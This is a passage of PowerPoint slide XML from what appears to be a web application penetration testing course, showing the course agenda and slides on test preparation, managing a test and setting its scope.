                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'s View, Pen-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Testing, &amp; Scoping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Recon &amp; Mapping</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Application Discovery Cont.</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Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Capture the Flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="5194300" y="152400"/>
            <a:ext cx="520700" cy="6248400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 328"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 328"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 328"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 328 w 328"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="328" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="1445"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="963"/>
                  <a:pt x="219" y="482"/>
                  <a:pt x="328" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="328" y="3984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="3105"/>
                  <a:pt x="109" y="2324"/>
                  <a:pt x="0" y="1445"/>
                </a:cubicBez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
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="152400"/>
            <a:ext cx="3276600" cy="6705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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Why the Web?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web App Pen Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web Site Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> The HTTP Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTP Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HTTP Status Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Examining HTTP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Session Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Analyzing HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SamuraiWTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Penetration Testing Types and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>   Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web App Pen Test Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Reporting and Presenting Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Attack Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Types of Flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript for Pen Testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Statements, Variables,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Functions, &amp; Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> The DOM, Methods, and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>    Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> AJAX and XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> JavaScript Exercise</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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web App Pen Test Preparation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113667" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1828800"/>
            <a:ext cx="8305800" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Preparation is the first step …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>… and it never stops</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>You are preparing right now</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Includes developing your skills and planning a test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Practice, Practice, Practice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Everyday should involve some practice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Try new techniques, analyze new tools, look for new ways of exploiting flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Practice as a team</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Build a lab with multiple target web servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Use web applications installed specifically for testing and practice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Open source applications are perfect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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Managing a Web App </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Penetration Test</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114691" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1569720"/>
            <a:ext cx="8382000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Managing penetration tests should be started BEFORE the hands-on testing begins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This step is often overlooked or skimped on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Involves the testing team as well as  target system personnel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>And any vendors or infrastructure providers (Think cloud)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Developers can also be brought into this process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Encourage their taking part to help improve security awareness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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Establishing the Test Scope</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115715" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="381000" y="1554480"/>
            <a:ext cx="8382000" cy="4114800"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The purpose of the test should be known</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>What are the biggest concerns associated with the target application(s)?  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>For example, is the application owner worried about authentication issues?  Personally Identifiable Information (PII) breach?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Such information will impact the focus of the test but should not blind the tester from issues within the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The type of test should be agreed upon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Grey box or crystal box</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Ensure everyone involved knows what is needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
